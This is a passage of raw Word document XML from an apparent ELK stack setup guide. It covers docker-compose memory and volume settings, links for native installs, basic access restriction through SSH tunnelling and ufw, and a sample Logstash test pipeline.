      <w:r w:rsidRPr="00DA611A">
        <w:t>docker-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>compose.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> — service definitions, volumes, ports.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD981E4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/pipeline/ — initial pipeline definitions (if provided).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C58D5AF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Important settings to set before starting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470A437C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ELASTIC_PASSWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> (in .env):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCBCCA0" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Use a strong password and store securely (not in Git).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78761B7F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Memory settings</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609BD43" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>You can adjust ES_JAVA_OPTS for Elasticsearch via environment variables to limit heap, e.g. -Xms4g -Xmx4g for 4GB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAEA35C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">In Docker Compose environment for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CBDC91B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>environment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D8CBA2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  - ES_JAVA_OPTS=-Xms4g -Xmx4g</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2308A985" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>For small VMs you may set to 2g, but performance will be degraded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5C187A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Persistent storage</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E23CCE6" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Docker volumes map to local host paths. Ensure docker-elk's volumes: are pointing to directories large enough.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E785F75" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF2E56A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53581283" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  - </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>esdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CB00EE" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>volumes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFA665" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>esdata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CF34F3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="1440"/>
        </w:tabs>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">    driver: local</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162F3A54" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Keep enough disk space; logs/indexes grow fast.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CDD5925" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="4B681C17">
          <v:rect id="_x0000_i1044" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B1B5DC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2.3 Option B — Native / Package installs (alternative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="369A9576" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>If you prefer manual installs (not recommended for beginners), follow Elastic docs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63648FDB" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Install Elasticsearch: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/deb.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="23EFA30C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Install Logstash: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/logstash/current/installing-logstash.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3B4EB8B5" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Install Kibana: </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/kibana/current/deb.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5610DE2E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Native installs require more OS-level config (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>systemd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> units, TLS, user permissions).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6028702A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="740A83E1">
          <v:rect id="_x0000_i1045" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A63D2DA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2.4 Configure basic security (do this before exposing Kibana/ES to network)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329CB5A3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DO NOT</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> expose Elasticsearch/Kibana to the public internet. For local team access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40F0E9C8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Option 1 — SSH port forwarding (safe)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75458701" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>From developer machine:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07591A0B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"># Forward local port 5601 to remote </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>kibana</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0048C209" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">ssh -L 5601:localhost:5601 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>user@elk-host</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="024882EE" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t># Then open http://localhost:5601 in your browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32D385A8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Option 2 — firewall &amp; bind addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77BB51C9" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> to restrict inbound access:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D8F2E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> allow from &lt;your-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">&gt; to any port 5601 proto </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CAAC363" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>ufw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> enable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E16611D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA611A">
        <w:t>Or configure Kibana to listen only on 127.0.0.1 and use tunnels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B987F90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Enable TLS &amp; RBAC (production)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44626B9D" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Elastic has built-in security — follow docs for production: TLS certs, user roles, and API keys.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DA611A">
        <w:br/>
        <w:t xml:space="preserve">Docs: </w:t>
      </w:r>
      <w:hyperlink r:id="rId28" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00DA611A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/elasticsearch/reference/current/configuring-tls.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0EC737A3" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00000000" w:rsidP="00DA611A">
      <w:r>
        <w:pict w14:anchorId="527253A9">
          <v:rect id="_x0000_i1046" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BAE1447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2.5 Add a simple Logstash pipeline for test ingestion (optional quick test)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304C93C7" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Create docker-elk/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>/pipeline/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>test.conf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CE04AD" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>input {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9609FB" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  beats {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D09D7AD" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">    port =&gt; 5044</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA3B421" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C423D3E" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3434328A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="5183A8C1" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>filter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42EDDF09" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  mutate { </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>add_field</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> =&gt; { "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>received_via</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>" =&gt; "beats-test" } }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A923DD4" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175AB487" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A"/>
    <w:p w14:paraId="0DCC4F9A" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>output {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72166F07" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AE6690" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">    hosts =&gt; ["elasticsearch:9200"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA18870" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">    index =&gt; "test-logs-%{+YYYY.MM.dd}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FC20A2" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">    user =&gt; "elastic"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607CA8B6" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">    password =&gt; "${ELASTIC_PASSWORD}"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2961415C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131527D6" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> { codec =&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>rubydebug</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA6062C" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5547A01F" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t>Then restart Logstash:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D6B2CF" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
        <w:t xml:space="preserve">docker compose restart </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA611A">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4296781B" w14:textId="77777777" w:rsidR="00DA611A" w:rsidRPr="00DA611A" w:rsidRDefault="00DA611A" w:rsidP="00DA611A">
      <w:r w:rsidRPr="00DA611A">
